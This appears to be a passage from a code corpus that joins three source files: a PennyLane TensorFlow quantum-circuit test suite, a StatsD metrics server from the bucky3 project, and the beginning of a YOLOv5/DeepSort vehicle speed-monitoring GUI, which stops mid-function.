c = c[0] # get a scalar
return c +0.5*array[0,0] +x -0.4*y
with tf.GradientTape() as tape:
cost_res = cost(*args)
grad_res = np.array([i.numpy() for i in tape.gradient(cost_res, [args[0], args[2]])])
assert np.allclose(cost_res.numpy(), cost_target, atol=tol, rtol=0)
assert np.allclose(grad_res, np.fromiter(grad_target[::2], dtype=np.float32), atol=tol, rtol=0)
def test_array_parameters_evaluate(self, qubit_device_2_wires, tol):
"""Test that array parameters gives same result as positional arguments."""
a, b, c = tf.constant(0.5), tf.constant(0.54), tf.constant(0.3)
def ansatz(x, y, z):
qml.QubitStateVector(np.array([1, 0, 1, 1])/np.sqrt(3), wires=[0, 1])
qml.Rot(x, y, z, wires=0)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliY(1))
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit1(x, y, z):
return ansatz(x, y, z)
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit2(x, array):
return ansatz(x, array[0], array[1])
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit3(array):
return ansatz(*array)
positional_res = circuit1(a, b, c)
array_res1 = circuit2(a, Variable([b, c]))
array_res2 = circuit3(Variable([a, b, c]))
assert np.allclose(positional_res.numpy(), array_res1.numpy(), atol=tol, rtol=0)
assert np.allclose(positional_res.numpy(), array_res2.numpy(), atol=tol, rtol=0)
def test_multiple_expectation_different_wires(self, qubit_device_2_wires, tol):
"""Tests that qnodes return multiple expectation values."""
a, b, c = Variable(0.5), Variable(0.54), Variable(0.3)
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(x, y, z):
qml.RX(x, wires=[0])
qml.RZ(y, wires=[0])
qml.CNOT(wires=[0, 1])
qml.RY(y, wires=[0])
qml.RX(z, wires=[0])
return qml.expval(qml.PauliY(0)), qml.expval(qml.PauliZ(1))
res = circuit(a, b, c)
out_state = np.kron(Rotx(c.numpy()), I) @ np.kron(Roty(b.numpy()), I) @ CNOT \
@ np.kron(Rotz(b.numpy()), I) @ np.kron(Rotx(a.numpy()), I) @ np.array([1, 0, 0, 0])
ex0 = np.vdot(out_state, np.kron(Y, I) @ out_state)
ex1 = np.vdot(out_state, np.kron(I, Z) @ out_state)
ex = np.array([ex0, ex1])
assert np.allclose(ex, res.numpy(), atol=tol, rtol=0)
def test_multiple_keywordargs_used(self, qubit_device_2_wires, tol):
"""Tests that qnodes use multiple keyword arguments."""
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(w, x=None, y=None):
qml.RX(x, wires=[0])
qml.RX(y, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
c = circuit(tf.constant(1.), x=np.pi, y=np.pi)
assert np.allclose(c.numpy(), [-1., -1.], atol=tol, rtol=0)
def test_multidimensional_keywordargs_used(self, qubit_device_2_wires, tol):
"""Tests that qnodes use multi-dimensional keyword arguments."""
def circuit(w, x=None):
qml.RX(x[0], wires=[0])
qml.RX(x[1], wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
c = circuit(tf.constant(1.), x=[np.pi, np.pi])
assert np.allclose(c.numpy(), [-1., -1.], atol=tol, rtol=0)
def test_keywordargs_for_wires(self, qubit_device_2_wires, tol):
"""Tests that wires can be passed as keyword arguments."""
default_q = 0
def circuit(x, q=default_q):
qml.RY(x, wires=0)
return qml.expval(qml.PauliZ(q))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
c = circuit(tf.constant(np.pi), q=1)
assert np.allclose(c, 1., atol=tol, rtol=0)
c = circuit(tf.constant(np.pi))
assert np.allclose(c.numpy(), -1., atol=tol, rtol=0)
def test_keywordargs_used(self, qubit_device_1_wire, tol):
"""Tests that qnodes use keyword arguments."""
def circuit(w, x=None):
qml.RX(x, wires=[0])
return qml.expval(qml.PauliZ(0))
circuit = qml.QNode(circuit, qubit_device_1_wire).to_tf()
c = circuit(tf.constant(1.), x=np.pi)
assert np.allclose(c.numpy(), -1., atol=tol, rtol=0)
def test_mixture_numpy_tensors(self, qubit_device_2_wires, tol):
"""Tests that qnodes work with python types and tensors."""
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit(w, x, y):
qml.RX(x, wires=[0])
qml.RX(y, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
c = circuit(tf.constant(1.), np.pi, np.pi).numpy()
assert np.allclose(c, [-1., -1.], atol=tol, rtol=0)
def test_keywordarg_updated_in_multiple_calls(self, qubit_device_2_wires):
"""Tests that qnodes update keyword arguments in consecutive calls."""
def circuit(w, x=None):
qml.RX(w, wires=[0])
qml.RX(x, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
c1 = circuit(tf.constant(0.1), x=tf.constant(0.))
c2 = circuit(tf.constant(0.1), x=np.pi)
assert c1[1] != c2[1]
def test_keywordarg_passes_through_classicalnode(self, qubit_device_2_wires, tol):
"""Tests that qnodes' keyword arguments pass through classical nodes."""
def circuit(w, x=None):
qml.RX(w, wires=[0])
qml.RX(x, wires=[1])
return qml.expval(qml.PauliZ(0)), qml.expval(qml.PauliZ(1))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
def classnode(w, x=None):
return circuit(w, x=x)
c = classnode(tf.constant(0.), x=np.pi)
assert np.allclose(c.numpy(), [1., -1.], atol=tol, rtol=0)
def test_keywordarg_gradient(self, qubit_device_2_wires, tol):
"""Tests that qnodes' keyword arguments work with gradients"""
def circuit(x, y, input_state=np.array([0, 0])):
qml.BasisState(input_state, wires=[0, 1])
qml.RX(x, wires=[0])
qml.RY(y, wires=[0])
return qml.expval(qml.PauliZ(0))
circuit = qml.QNode(circuit, qubit_device_2_wires).to_tf()
x = 0.543
y = 0.45632
expected_grad = np.array([np.sin(x)*np.cos(y), np.sin(y)*np.cos(x)])
x_t = Variable(x)
y_t = Variable(y)
# test first basis state against analytic result
with tf.GradientTape() as tape:
c = circuit(x_t, y_t, input_state=np.array([0, 0]))
grads = np.array(tape.gradient(c, [x_t, y_t]))
assert np.allclose(grads, -expected_grad, atol=tol, rtol=0)
# test third basis state against analytic result
with tf.GradientTape() as tape:
c = circuit(x_t, y_t, input_state=np.array([1, 0]))
grads = np.array(tape.gradient(c, [x_t, y_t]))
assert np.allclose(grads, expected_grad, atol=tol, rtol=0)
# test first basis state via the default keyword argument against analytic result
with tf.GradientTape() as tape:
c = circuit(x_t, y_t)
grads = np.array(tape.gradient(c, [x_t, y_t]))
assert np.allclose(grads, -expected_grad, atol=tol, rtol=0)
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestIntegration:
"""Integration tests to ensure the TensorFlow QNode agrees with the NumPy QNode"""
def test_qnode_evaluation_agrees(self, qubit_device_2_wires, tol):
"""Tests that simple example is consistent."""
@qml.qnode(qubit_device_2_wires, interface='autograd')
def circuit(phi, theta):
qml.RX(phi[0], wires=0)
qml.RY(phi[1], wires=1)
qml.CNOT(wires=[0, 1])
qml.PhaseShift(theta[0], wires=0)
return qml.expval(qml.PauliZ(0))
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit_tf(phi, theta):
qml.RX(phi[0], wires=0)
qml.RY(phi[1], wires=1)
qml.CNOT(wires=[0, 1])
qml.PhaseShift(theta[0], wires=0)
return qml.expval(qml.PauliZ(0))
phi = [0.5, 0.1]
theta = [0.2]
phi_t = Variable(phi)
theta_t = Variable(theta)
autograd_eval = circuit(phi, theta)
tf_eval = circuit_tf(phi_t, theta_t)
assert np.allclose(autograd_eval, tf_eval.numpy(), atol=tol, rtol=0)
def test_qnode_gradient_agrees(self, qubit_device_2_wires, tol):
"""Tests that simple gradient example is consistent."""
@qml.qnode(qubit_device_2_wires, interface='autograd')
def circuit(phi, theta):
qml.RX(phi[0], wires=0)
qml.RY(phi[1], wires=1)
qml.CNOT(wires=[0, 1])
qml.PhaseShift(theta[0], wires=0)
return qml.expval(qml.PauliZ(0))
@qml.qnode(qubit_device_2_wires, interface='tf')
def circuit_tf(phi, theta):
qml.RX(phi[0], wires=0)
qml.RY(phi[1], wires=1)
qml.CNOT(wires=[0, 1])
qml.PhaseShift(theta[0], wires=0)
return qml.expval(qml.PauliZ(0))
phi = [0.5, 0.1]
theta = [0.2]
phi_t = Variable(phi)
theta_t = Variable(theta)
dcircuit = qml.grad(circuit, [0, 1])
autograd_grad = dcircuit(phi, theta)
with tf.GradientTape() as g:
g.watch([phi_t, theta_t])
y = circuit_tf(phi_t, theta_t)
tf_grad = g.gradient(y, [phi_t, theta_t])
assert np.allclose(autograd_grad[0], tf_grad[0], atol=tol, rtol=0)
assert np.allclose(autograd_grad[1], tf_grad[1], atol=tol, rtol=0)
gradient_test_data = [
(0.5, -0.1),
(0.0, np.pi),
(-3.6, -3.6),
(1.0, 2.5),
]
@pytest.mark.usefixtures("skip_if_no_tf_support")
class TestTFGradients:
"""Integration tests involving gradients of QNodes and hybrid computations using the tf interface"""
@pytest.fixture
def qnodes(self):
"""Two QNodes to be used for the gradient tests"""
dev = qml.device("default.qubit", wires=2)
@qml.qnode(dev, interface="tf")
def f(x):
qml.RX(x, wires=0)
return qml.expval(qml.PauliZ(0))
@qml.qnode(dev, interface="tf")
def g(y):
qml.RY(y, wires=0)
return qml.expval(qml.PauliX(0))
return f, g
@pytest.mark.parametrize("x, y", gradient_test_data)
def test_addition_qnodes_gradient(self, qnodes, x, y):
"""Test the gradient of addition of two QNode circuits"""
f, g = qnodes
def add(a, b):
return a + b
xt = Variable(x)
yt = Variable(y)
# addition
with tf.GradientTape() as tape:
tape.watch([xt, yt])
a = f(xt)
b = g(yt)
y = add(a, b)
grad = tape.gradient(y, [a, b])
assert grad[0].numpy() == 1.0
assert grad[1].numpy() == 1.0
# same tensor added to itself
with tf.GradientTape() as tape:
tape.watch([xt, yt])
a = f(xt)
y = add(a, a)
grad = tape.gradient(y, [a, a])
assert grad[0].numpy() == 2.0
assert grad[1].numpy() == 2.0
# different qnodes with same input parameter added together
with tf.GradientTape() as tape:
tape.watch([xt, yt])
a = f(xt)
b = g(xt)
y = add(a, b)
grad = tape.gradient(y, [a, b])
assert grad[0].numpy() == 1.0
assert grad[1].numpy() == 1.0
@pytest.mark.parametrize("x, y", gradient_test_data)
def test_subtraction_qnodes_gradient(self, qnodes, x, y):
"""Test the gradient of subtraction of two QNode circuits"""
f, g = qnodes
def subtract(a, b):
return a - b
xt = Variable(x)
yt = Variable(y)
# subtraction
with tf.GradientTape() as tape:
tape.watch([xt, yt])
a = f(xt)
b = g(yt)
y = subtract(a, b)
grad = tape.gradient(y, [a, b])
assert grad[0].numpy() == 1.0
assert grad[1].numpy() == -1.0
@pytest.mark.parametrize("x, y", gradient_test_data)
def test_multiplication_qnodes_gradient(self, qnodes, x, y):
"""Test the gradient of multiplication of two QNode circuits"""
f, g = qnodes
def mult(a, b):
return a * b
xt = Variable(x)
yt = Variable(y)
# multiplication
with tf.GradientTape() as tape:
tape.watch([xt, yt])
a = f(xt)
b = g(yt)
y = mult(a, b)
grad = tape.gradient(y, [a, b])
assert grad[0].numpy() == b.numpy()
assert grad[1].numpy() == a.numpy()
@pytest.mark.parametrize("x, y", gradient_test_data)
def test_division_qnodes_gradient(self, qnodes, x, y, tol):
"""Test the gradient of division of two QNode circuits"""
f, g = qnodes
def div(a, b):
return a / b
xt = Variable(x)
yt = Variable(y)
# division
with tf.GradientTape() as tape:
tape.watch([xt, yt])
a = f(xt)
b = g(yt)
y = div(a, b)
grad = tape.gradient(y, [a, b])
assert grad[0].numpy() == 1 / b.numpy()
assert np.allclose(grad[1].numpy(), -a.numpy() / b.numpy() ** 2, atol=tol, rtol=0)
@pytest.mark.parametrize("x, y", gradient_test_data)
def test_composition_qnodes_gradient(self, qnodes, x, y):
"""Test the gradient of composition of two QNode circuits"""
f, g = qnodes
xt = Variable(x)
yt = Variable(y)
# compose function with xt as input
with tf.GradientTape() as tape:
tape.watch([xt])
y = f(xt)
grad1 = tape.gradient(y, xt)
with tf.GradientTape() as tape:
tape.watch([xt])
y = f(xt)
grad2 = tape.gradient(y, xt)
assert tf.equal(grad1, grad2)
# compose function with a as input
with tf.GradientTape() as tape:
tape.watch([xt])
a = f(xt)
y = f(a)
grad1 = tape.gradient(y, a)
with tf.GradientTape() as tape:
tape.watch([xt])
a = f(xt)
y = f(a)
grad2 = tape.gradient(y, a)
assert tf.equal(grad1, grad2)
# compose function with b as input
with tf.GradientTape() as tape:
tape.watch([xt])
b = g(xt)
y = g(b)
grad1 = tape.gradient(y, b)
with tf.GradientTape() as tape:
tape.watch([xt])
b = g(xt)
y = g(b)
grad2 = tape.gradient(y, b)
assert tf.equal(grad1, grad2)
| 35.994444 | 115 | 0.587861 |
de653c89ff97f8f9124be9ca82bdbb3f191e90bb | 13,244 | py | Python | bucky3/statsd.py | smarkets/bucky3 | 7bca15c28d3e55027b831923c43a811da9d62ecb | [
"Apache-2.0"
] | null | null | null | bucky3/statsd.py | smarkets/bucky3 | 7bca15c28d3e55027b831923c43a811da9d62ecb | [
"Apache-2.0"
] | null | null | null | bucky3/statsd.py | smarkets/bucky3 | 7bca15c28d3e55027b831923c43a811da9d62ecb | [
"Apache-2.0"
] | 1 | 2022-03-26T12:11:29.000Z | 2022-03-26T12:11:29.000Z | # -*- coding: utf-8 -
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
# Copyright 2011 Cloudant, Inc.
import time
import socket
import threading
import bucky3.module as module
class StatsDServer(module.MetricsSrcProcess, module.UDPConnector):
def __init__(self, *args):
super().__init__(*args)
self.sock = None
self.timers = {}
self.timers_lock = threading.Lock()
self.histograms = {}
self.histograms_lock = threading.Lock()
self.gauges = {}
self.gauges_lock = threading.Lock()
self.counters = {}
self.counters_lock = threading.Lock()
self.sets = {}
self.sets_lock = threading.Lock()
self.last_timestamp = 0
self.metrics_received = 0
def flush(self, system_timestamp):
self.enqueue_timers(system_timestamp)
self.enqueue_histograms(system_timestamp)
self.enqueue_counters(system_timestamp)
self.enqueue_gauges(system_timestamp)
self.enqueue_sets(system_timestamp)
self.last_timestamp = system_timestamp
return super().flush(system_timestamp)
def init_cfg(self):
super().init_cfg()
percentile_thresholds = self.cfg.get('percentile_thresholds', ())
self.percentile_thresholds = sorted(set(round(float(t), 2) for t in percentile_thresholds if t > 0 and t <= 100))
self.histogram_selector = self.cfg.get('histogram_selector')
self.timestamp_window = self.cfg.get('timestamp_window', 600)
def read_loop(self):
sock = self.open_socket(bind=True)
self.last_timestamp = round(time.time(), 3)
while True:
try:
data, addr = sock.recvfrom(65535)
self.handle_packet(data, addr)
except (InterruptedError, socket.timeout):
pass
def loop(self):
self.start_thread('UdpReadThread', self.read_loop)
super().loop()
def produce_self_report(self):
self_report = super().produce_self_report()
self_report['metrics_received'] = self.metrics_received
return self_report
def enqueue_timers(self, system_timestamp):
interval = system_timestamp - self.last_timestamp
bucket = self.cfg['timers_bucket']
timestamp = system_timestamp if self.add_timestamps else None
with self.timers_lock:
for k, (cust_timestamp, v) in self.timers.items():
v.sort()
count = len(v)
thresholds = ((count if t == 100 else (t * count) // 100, t) for t in self.percentile_thresholds)
try:
next_i, next_t = next(thresholds)
vlen = vsum = vsum_squares = 0
for i, x in enumerate(v):
vlen += 1
vsum += x
vsum_squares += x * x
while i >= next_i - 1:
mean = vsum / vlen
stats = {'count': vlen, 'count_ps': vlen / interval, 'lower': v[0], 'upper': x, 'mean': mean}
if vlen > 1:
var = (vsum_squares - 2 * mean * vsum + vlen * mean * mean) / (vlen - 1)
# FP rounding can lead to negative variance and in consequence complex stdev.
# I.e. three samples of [0.003, 0.003, 0.003]
var = max(var, 0)
stats['stdev'] = var ** 0.5
metadata = {'percentile': str(next_t)}
metadata.update(k)
self.buffer_metric(bucket, stats, cust_timestamp or timestamp, metadata)
next_i, next_t = next(thresholds)
except StopIteration:
pass
self.timers = {}
def enqueue_histograms(self, system_timestamp):
interval = system_timestamp - self.last_timestamp
bucket = self.cfg['histograms_bucket']
timestamp = system_timestamp if self.add_timestamps else None
with self.histograms_lock:
for k, (cust_timestamp, selector, buckets) in self.histograms.items():
for histogram_bucket, (vlen, vsum, vsum_squares, vmin, vmax) in buckets.items():
mean = vsum / vlen
stats = {'count': vlen, 'count_ps': vlen / interval, 'lower': vmin, 'upper': vmax, 'mean': mean}
if vlen > 1:
var = (vsum_squares - 2 * mean * vsum + vlen * mean * mean) / (vlen - 1)
var = max(var, 0)
stats['stdev'] = var ** 0.5
metadata = {'histogram': str(histogram_bucket)}
metadata.update(k)
self.buffer_metric(bucket, stats, cust_timestamp or timestamp, metadata)
self.histograms = {}
def enqueue_sets(self, system_timestamp):
bucket = self.cfg['sets_bucket']
timestamp = system_timestamp if self.add_timestamps else None
with self.sets_lock:
for k, (cust_timestamp, v) in self.sets.items():
self.buffer_metric(bucket, {"count": len(v)}, cust_timestamp or timestamp, dict(k))
self.sets = {}
def enqueue_gauges(self, system_timestamp):
bucket = self.cfg['gauges_bucket']
timestamp = system_timestamp if self.add_timestamps else None
with self.gauges_lock:
for k, (cust_timestamp, v) in self.gauges.items():
self.buffer_metric(bucket, {"value": float(v)}, cust_timestamp or timestamp, dict(k))
self.gauges = {}
def enqueue_counters(self, system_timestamp):
interval = system_timestamp - self.last_timestamp
bucket = self.cfg['counters_bucket']
timestamp = system_timestamp if self.add_timestamps else None
with self.counters_lock:
for k, (cust_timestamp, v) in self.counters.items():
stats = {
'rate': float(v) / interval,
'count': float(v)
}
self.buffer_metric(bucket, stats, cust_timestamp or timestamp, dict(k))
self.counters = {}
def handle_packet(self, data, addr=None):
# Adding a bit of extra sauce so clients can send multiple samples in a single UDP packet.
try:
recv_timestamp, data = round(time.time(), 3), data.decode("ascii")
except UnicodeDecodeError:
return
for line in data.splitlines():
line = line.strip()
if line:
self.handle_line(recv_timestamp, line)
def handle_line(self, recv_timestamp, line):
# DataDog special packets for service check and events, ignore them
if line.startswith('sc|') or line.startswith('_e{'):
return
try:
cust_timestamp, line, metadata = self.handle_metadata(recv_timestamp, line)
except ValueError:
return
if not line:
return
bits = line.split(":")
if len(bits) < 2:
return
name = bits.pop(0)
if not name.isidentifier():
return
key, metadata = self.handle_key(name, metadata)
if not key:
return
# I'm not sure if statsd is doing this on purpose but the code allows for name:v1|t1:v2|t2 etc.
# In the interest of compatibility, I'll maintain the behavior.
for sample in bits:
if "|" not in sample:
continue
fields = sample.split("|")
valstr = fields[0]
if not valstr:
continue
typestr = fields[1]
ratestr = fields[2] if len(fields) > 2 else None
try:
if typestr == "ms" or typestr == "h":
self.handle_timer(cust_timestamp, key, metadata, valstr, ratestr)
elif typestr == "g":
self.handle_gauge(cust_timestamp, key, metadata, valstr, ratestr)
elif typestr == "s":
self.handle_set(cust_timestamp, key, metadata, valstr, ratestr)
else:
self.handle_counter(cust_timestamp, key, metadata, valstr, ratestr)
self.metrics_received += 1
except ValueError:
pass
def handle_metadata(self, recv_timestamp, line):
# http://docs.datadoghq.com/guides/dogstatsd/#datagram-format
bits = line.split("|#", 1) # We allow '#' in tag values, too
cust_timestamp, metadata = None, {}
if len(bits) < 2:
return cust_timestamp, line, metadata
for i in bits[1].split(","):
if not i:
continue
# Due to how we parse the metadata, comma is the only illegal character
# in tag values, everything else will be taken literally.
# Prometheus and Influx modules handle escaping the special chars as needed.
# There is no special char handling in carbon module at all, i.e. it is flawed.
k, _, v = i.partition('=')
if not k.isidentifier() or not v:
raise ValueError()
if k == 'timestamp':
cust_timestamp = float(v)
# Assume millis not secs if the timestamp >= 2^31
if cust_timestamp > 2147483647:
cust_timestamp /= 1000
if abs(recv_timestamp - cust_timestamp) > self.timestamp_window:
raise ValueError()
cust_timestamp = round(cust_timestamp, 3)
elif k == 'bucket':
if not v.isidentifier():
raise ValueError()
metadata[k] = v
else:
metadata[k] = v
return cust_timestamp, bits[0], metadata
def handle_key(self, name, metadata):
metadata.update(name=name)
key = tuple((k, metadata[k]) for k in sorted(metadata.keys()))
return key, metadata
def handle_timer(self, cust_timestamp, key, metadata, valstr, ratestr):
val = float(valstr)
with self.timers_lock:
if key in self.timers:
buf = self.timers[key][1]
buf.append(val)
self.timers[key] = cust_timestamp, buf
else:
self.timers[key] = cust_timestamp, [val]
if self.histogram_selector is None:
return
with self.histograms_lock:
histogram = self.histograms.get(key)
if histogram is None:
selector = self.histogram_selector(metadata)
if selector is None:
return
buckets = {}
else:
selector = histogram[1]
buckets = histogram[2]
bucket_name = selector(val)
if bucket_name:
bucket_stats = buckets.get(bucket_name)
if bucket_stats:
vlen, vsum, vsum_squares, vmin, vmax = bucket_stats
else:
vlen = vsum = vsum_squares = 0
vmin = vmax = val
buckets[bucket_name] = (
vlen + 1, vsum + val, vsum_squares + val * val, min(val, vmin), max(val, vmax)
)
self.histograms[key] = cust_timestamp, selector, buckets
def handle_gauge(self, cust_timestamp, key, metadata, valstr, ratestr):
val = float(valstr)
delta = valstr[0] in "+-"
with self.gauges_lock:
if delta and key in self.gauges:
self.gauges[key] = cust_timestamp, self.gauges[key][1] + val
else:
self.gauges[key] = cust_timestamp, val
def handle_set(self, cust_timestamp, key, metadata, valstr, ratestr):
with self.sets_lock:
if key in self.sets:
buf = self.sets[key][1]
buf.add(valstr)
self.sets[key] = cust_timestamp, buf
else:
self.sets[key] = cust_timestamp, {valstr}
def handle_counter(self, cust_timestamp, key, metadata, valstr, ratestr):
if ratestr and ratestr[0] == "@":
rate = float(ratestr[1:])
if rate > 0 and rate <= 1:
val = float(valstr) / rate
else:
return
else:
val = float(valstr)
with self.counters_lock:
if key in self.counters:
val += self.counters[key][1]
self.counters[key] = cust_timestamp, val
| 41.77918 | 121 | 0.553609 |
0824afd7e96bf3bf971d3da7c2e93bad5d917fea | 16,720 | py | Python | GUI/Monitoring.py | kyvipro113/Speed_Monitoring_System | 3ce877c87644bfe20a1d59f3cd6c0435c772e5c5 | [
"MIT"
] | null | null | null | GUI/Monitoring.py | kyvipro113/Speed_Monitoring_System | 3ce877c87644bfe20a1d59f3cd6c0435c772e5c5 | [
"MIT"
] | null | null | null | GUI/Monitoring.py | kyvipro113/Speed_Monitoring_System | 3ce877c87644bfe20a1d59f3cd6c0435c772e5c5 | [
"MIT"
] | null | null | null | from PyQt5.QtWidgets import QFrame
from GUI.Ui_Monitoring import Ui_Monitoring
from PyQt5 import QtWidgets
from PyQt5.QtCore import pyqtSlot, pyqtSignal, QThread, Qt, pyqtSlot
from PyQt5.QtGui import QImage, QPixmap
from PyQt5.QtWidgets import QFileDialog
import cv2
from pathlib import Path
import os.path
import numpy as np
import time
import sys
sys.path.insert(0, './yolov5')
from yolov5.models.experimental import attempt_load
from yolov5.utils.datasets import LoadImages, LoadStreams
from yolov5.utils.general import check_img_size, non_max_suppression, scale_coords, check_imshow
from yolov5.utils.torch_utils import select_device
from deep_sort_pytorch.utils.parser import get_config
from deep_sort_pytorch.deep_sort import DeepSort
import os
from pathlib import Path
import cv2
import torch
import torch.backends.cudnn as cudnn
import math
from SQL_Connection.SQLConnection import SQLConnection
import datetime
path_save_violating_vehicle = "violating_vehicle/"
if not (os.path.isdir("violating_vehicle")):
os.mkdir("violating_vehicle")
violation_time = {}
SQL = SQLConnection()
palette = (2 ** 11 - 1, 2 ** 15 - 1, 2 ** 20 - 1)
pixels_per_meter = 1
fps = 0
fileName = ""
videoFile = ""
carStartPosition = {}
carCurrentPosition = {}
speed = {}
violating_vehicle = {}
violating_name = {}
def bbox_rel(*xyxy):
bbox_left = min([xyxy[0].item(), xyxy[2].item()])
bbox_top = min([xyxy[1].item(), xyxy[3].item()])
bbox_w = abs(xyxy[0].item() - xyxy[2].item())
bbox_h = abs(xyxy[1].item() - xyxy[3].item())
x_c = (bbox_left + bbox_w / 2)
y_c = (bbox_top + bbox_h / 2)
w = bbox_w
h = bbox_h
return x_c, y_c, w, h
def compute_color_for_labels(label):
color = [int((p * (label ** 2 - label + 1)) % 255) for p in palette]
return tuple(color)
def draw_boxes(img, bbox, identities=None, speed = {}, offset=(0, 0)):
for i, box in enumerate(bbox):
x1, y1, x2, y2 = [int(i) for i in box]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
# box text and bar
id = int(identities[i]) if identities is not None else 0
color = compute_color_for_labels(id)
label = '{}{:d}'.format("", id)
t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2, 2)[0]
cv2.rectangle(img, (x1, y1), (x2, y2), color, 3)
cv2.rectangle(
img, (x1, y1), (x1 + t_size[0] + 3, y1 + t_size[1] + 4), color, -1)
cv2.putText(img, label, (x1, y1 + t_size[1] + 4), cv2.FONT_HERSHEY_PLAIN, 2, [255, 255, 255], 2)
if not (speed == {}):
if id in speed:
cv2.putText(img, str(speed[id]) + "km/h", (x1 + 30, y1 + t_size[1] + 20), cv2.FONT_HERSHEY_PLAIN, 4, [255, 255, 255], 2)
return img
flag = False
def calculate_speed(startPosition, currentPosition, fps):
global pixels_per_meter
xG_start, yG_start = (startPosition[0] + startPosition[2]) / 2, (startPosition[1] + startPosition[3]) / 2
xG_current, yG_current = (currentPosition[0] + currentPosition[2]) / 2, (currentPosition[1] + currentPosition[3]) / 2
distance_in_pixels = math.sqrt(math.pow(xG_current - xG_start, 2) + math.pow(yG_current - yG_start, 2))
distance_in_meters = distance_in_pixels / pixels_per_meter
speed_in_meter_per_second = distance_in_meters * fps
speed_in_kilometer_per_hour = speed_in_meter_per_second * 3.6
if not speed == {}:
for id in carCurrentPosition.keys():
if id in speed:
if(speed[id] < 30 or speed[id] > 150):
if id not in violating_vehicle:
violating_vehicle[id] = carCurrentPosition[id]
violation_time[id] = datetime.datetime.now()
if(speed[id] == 0):
violating_name[id] = "Parking"
if(speed[id] < 30 and speed[id] > 0):
violating_name[id] = "Under Speed"
if(speed[id] > 150):
violating_name[id] = "Over Speed"
if(yG_start > 500 and yG_current < 50):
violating_name[id] = "Opposite Lane"
return speed_in_kilometer_per_hour
def cleanDictSpeed():
global speed
global carStartPosition
global carCurrentPosition
speed.clear()
carStartPosition.clear()
carCurrentPosition.clear()
violating_vehicle.clear()
class ThreadMonitoring(QThread): # Using thread for real-time detect and tracking
changePixmap = pyqtSignal(QImage)
def __init__(self, path = 0, parent=None):
QThread.__init__(self, parent=parent)
self.vid_src = path
def setPath(self, path):
self.vid_src = path
def run(self):
global carStartPosition
global carCurrentPosition
out, source, weights, view_vid, save_vid, imgsz = "output", self.vid_src, "yolov5/weights/yolov5s.pt", True, True, 640
webcam = source == '0' or source.startswith('rtsp') or source.startswith('http') or source.endswith('.txt')
# initialize deepsort
cfg = get_config()
cfg.merge_from_file('deep_sort_pytorch/configs/deep_sort.yaml')
deepsort = DeepSort(cfg.DEEPSORT.REID_CKPT,
max_dist=cfg.DEEPSORT.MAX_DIST, min_confidence=cfg.DEEPSORT.MIN_CONFIDENCE,
nms_max_overlap=cfg.DEEPSORT.NMS_MAX_OVERLAP, max_iou_distance=cfg.DEEPSORT.MAX_IOU_DISTANCE,
max_age=cfg.DEEPSORT.MAX_AGE, n_init=cfg.DEEPSORT.N_INIT, nn_budget=cfg.DEEPSORT.NN_BUDGET,
use_cuda=True)
# Initialize
device = select_device('') # Default CUDA
half = device.type != 'cpu' # half precision only supported on CUDA
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
stride = int(model.stride.max()) # model stride
imgsz = check_img_size(imgsz, s=stride) # check img_size
if half:
model.half() # to FP16
print(device.type)
# Set Dataloader
vid_writer, vid_path = None, None
# Check if environment supports image displays
if view_vid:
view_vid = check_imshow()
if webcam:
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadStreams(source, img_size=imgsz, stride=stride)
else:
dataset = LoadImages(source, img_size=imgsz)
# Run inference
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
save_path = str(Path(out))
# Count frame
count_frame = 0
start_time = 0
end_time = 0
while(flag):
for frame_idx, (path, img, im0s, vid_cap) in enumerate(dataset):
start_time = time.time()
img = torch.from_numpy(img).to(device)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
if not flag:
break
if img.ndimension() == 3:
img = img.unsqueeze(0)
if(frame_idx >=5):
count_frame += 1
# Inference
pred = model(img, augment='')[0]
# Apply NMS
pred = non_max_suppression(pred, 0.4, 0.5, classes=[2, 5, 6], agnostic=False)
# Process detections
for i, det in enumerate(pred): # detections per image
if webcam: # batch_size >= 1
p, s, im0 = path[i], '%g: ' % i, im0s[i].copy()
else:
p, s, im0 = path, '', im0s
save_path = str(Path(out) / Path(videoFile))
if det is not None and len(det):
# Rescale boxes from img_size to im0 size
det[:, :4] = scale_coords(
img.shape[2:], det[:, :4], im0.shape).round()
bbox_xywh = []
confs = []
# Adapt detections to deep sort input format
for *xyxy, conf, cls in det:
x_c, y_c, bbox_w, bbox_h = bbox_rel(*xyxy)
obj = [x_c, y_c, bbox_w, bbox_h]
bbox_xywh.append(obj)
if conf.item() > 0.55:
confs.append([conf.item()])
xywhs = torch.Tensor(bbox_xywh)
confss = torch.Tensor(confs)
# Pass detections to deepsort
outputs = deepsort.update(xywhs, confss, im0)
end_time = time.time()
# Calculate FPS
if not (start_time == end_time):
